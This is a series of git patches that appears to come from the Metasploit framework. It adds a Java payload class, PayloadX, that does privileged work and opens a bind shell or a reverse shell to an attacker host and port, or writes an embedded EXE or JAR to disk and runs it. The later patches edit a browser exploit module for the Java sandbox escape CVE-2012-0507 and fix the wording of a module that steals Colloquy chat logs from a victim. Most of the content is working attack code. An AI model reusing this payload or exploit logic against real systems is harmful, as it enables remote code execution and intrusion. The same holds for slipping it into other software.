@@ -0,0 +1,193 @@ +package msf.x; + +import java.io.BufferedReader; +import java.io.BufferedWriter; +import java.io.File; +import java.io.FileOutputStream; +import java.io.InputStream; +import java.io.InputStreamReader; +import java.io.OutputStream; +import java.io.OutputStreamWriter; +import java.net.ServerSocket; +import java.net.Socket; +import java.security.AccessController; +import java.security.PrivilegedExceptionAction; + +public class PayloadX implements PrivilegedExceptionAction +{ + // This will contain a hex string of the native payload to drop and execute. + public static String data = null; + public static String jar = null; + // If no native payload is set we get either a java bind shell or a java + // reverse shell. + public static String lhost = null; + public static int lport = 4444; + + class StreamConnector extends Thread + { + InputStream is; + OutputStream os; + + StreamConnector( InputStream is, OutputStream os ) + { + this.is = is; + this.os = os; + } + + public void run() + { + BufferedReader in = null; + BufferedWriter out = null; + + try + { + in = new BufferedReader( new InputStreamReader( is ) ); + out = new BufferedWriter( new OutputStreamWriter( os ) ); + char buffer[] = new char[8192]; + int length; + while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) + { + out.write( buffer, 0, length ); + out.flush(); + } + } + catch( Exception e ) {} + + try + { + if( in != null ) + in.close(); + if( out != null ) + out.close(); + } + catch( Exception e ) {} + } + } + + // http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java + public static byte[] StringToBytes( String s ) + { + byte[] data = new byte[s.length() / 2]; + + for( int i = 0 ; i < s.length() ; i += 2 ) + data[i / 2] = (byte)( ( Character.digit( s.charAt( i ), 16 ) << 4 ) + Character.digit( s.charAt( i + 1 ), 16 ) ); + + return data; + } + + public Object run() throws Exception + { + //System.out.println("Running"); 
+ // if the native payload data has not been set just return for now, it + // will be set by the next time we reach here. + if( PayloadX.data == null && PayloadX.jar == null ) + return null; + //System.out.println("have either data or jar"); + + try + { + String os = System.getProperty( "os.name" ); + + //System.out.println("OS: " + os); + // if we have no native payload to drop and execute we default to + // either a TCP bind or reverse shell. + if( PayloadX.data != null && PayloadX.data.length() == 0 && PayloadX.jar.length() == 0 ) + { + //System.out.println("no, exe/jar. Doing shell"); + Socket client_socket = null; + + String shell = "/bin/sh"; + + if( os.indexOf( "Windows" ) >= 0 ) + shell = "cmd.exe"; + + if( PayloadX.lhost == null ) + { + ServerSocket server_socket = new ServerSocket( PayloadX.lport ); + client_socket = server_socket.accept(); + } + else + { + client_socket = new Socket( PayloadX.lhost, PayloadX.lport ); + } + + if( client_socket != null ) + { + Process process = exec( shell ); + if( process != null ) + { + ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start(); + ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start(); + } + } + } + else if( PayloadX.jar != null && (PayloadX.jar.length() != 0) ) + { + //System.out.println("Dropping JAR"); + String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".jar"; + + writeFile( path, StringToBytes( PayloadX.jar ) ); + exec( "java -jar " + path + " " + PayloadX.lhost + " " + PayloadX.lport + " true"); + } + else + { + //System.out.println("Dropping EXE"); + String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".exe"; + + writeFile( path, StringToBytes( PayloadX.data ) ); + if( os.indexOf( "Windows" ) < 0 ) + { + exec( "chmod 755 " + path ); + } + exec( path ); + new File( path ).delete(); + } + } + catch( Exception e ) { + //System.out.println(e); + } + + return 
null; + } + + public Process exec( String path ) + { + Process p = null; + //System.out.println( "Executing" ); + try { + p = Runtime.getRuntime().exec( path ); + if( p == null ) + { + //System.out.println( "Null process, crap" ); + } + p.waitFor(); + } catch( Exception e ) { + //System.out.println(e); + } + return p; + } + + public void writeFile( String path, byte[] data ) + { + //System.out.println( "Writing file" ); + try { + FileOutputStream fos = new FileOutputStream( path ); + + fos.write( data ); + fos.close(); + } catch( Exception e ) { + //System.out.println(e); + } + } + + public PayloadX() + { + try + { + AccessController.doPrivileged( this ); + } + catch( Exception e ) { + //System.out.println(e); + } + } +} diff --git a/modules/exploits/multi/browser/java_atomicreferencearray.rb b/modules/exploits/multi/browser/java_atomicreferencearray.rb index 1ce83d4457..26fffc96ea 100644 --- a/modules/exploits/multi/browser/java_atomicreferencearray.rb +++ b/modules/exploits/multi/browser/java_atomicreferencearray.rb @@ -15,21 +15,21 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::EXE def initialize( info = {} ) - super( update_info( info, - 'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability', - 'Description' => %q{ + 'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability', + 'Description' => %q{ This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ - 'sinn3r', # metasploit module - 'juan vazquez' # metasploit module + 'sinn3r', # metasploit module + 'juan vazquez', # metasploit module + 'egypt' # special assistance ], 'References' => [ 
@@ -39,9 +39,9 @@ class Metasploit3 < Msf::Exploit::Remote ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'] ], - 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], - 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, - 'Targets' => + 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], + 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => [ [ 'Generic (Java Payload)', { @@ -92,9 +92,9 @@ class Metasploit3 < Msf::Exploit::Remote def on_request_uri( cli, request ) - data = nil - host = nil - port = nil + data = "" + host = "" + port = "" peer = "#{cli.peerhost}:#{cli.peerport}" if not request.uri.match(/\.jar$/i) @@ -148,16 +148,18 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status( "#{peer} - sending jar to ..." ) + print_status( "#{peer} - sending jar..." ) send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html( data, jar, host, port ) + jar_name = rand_text_alpha(rand(6)+3) + ".jar" + html = "" html += "" - html += "" + html += "" html += "" if data html += "" if jar html += "" if host From ae21c05e692382eb09d1ee15bbc3f6453ad1cc0b Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Fri, 30 Mar 2012 07:26:07 -0500 Subject: [PATCH 4/5] add osvdb ref --- modules/exploits/multi/browser/java_atomicreferencearray.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/multi/browser/java_atomicreferencearray.rb b/modules/exploits/multi/browser/java_atomicreferencearray.rb index 26fffc96ea..c24a6029a0 100644 --- a/modules/exploits/multi/browser/java_atomicreferencearray.rb +++ b/modules/exploits/multi/browser/java_atomicreferencearray.rb 
@@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2012-0507'], + ['OSVDB', '80724'], ['BID', '52161'], ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'], ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'], From 18a13a4bfb6c8fa6876a0bd4547bba350858f2bf Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 30 Mar 2012 11:22:55 -0500 Subject: [PATCH 5/5] Correct description --- modules/post/osx/gather/enum_colloquy.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/post/osx/gather/enum_colloquy.rb b/modules/post/osx/gather/enum_colloquy.rb index 9394d9c221..a0cb1f9994 100644 --- a/modules/post/osx/gather/enum_colloquy.rb +++ b/modules/post/osx/gather/enum_colloquy.rb @@ -20,12 +20,12 @@ class Metasploit3 < Msf::Post 'Name' => 'OSX Gather Colloquy Enumeration', 'Description' => %q{ This module will collect Colloquy's info plist file and chat logs from the - victim's machine. There are three actions you may choose: INFO, and CHATS, and - ALL. Please note that the CHAT action may time a long time depending on the + victim's machine. There are three actions you may choose: INFO, CHATS, and + ALL. Please note that the CHAT action may take a long time depending on the victim machine, therefore we suggest to set the regex 'PATTERN' option in order to search for certain log names (which consists of the contact's name, and a timestamp). The default 'PATTERN' is configured as "^alien" as an example - to search for any chatlogs associated with the name "alien". + to search for any chat logs associated with the name "alien". }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'],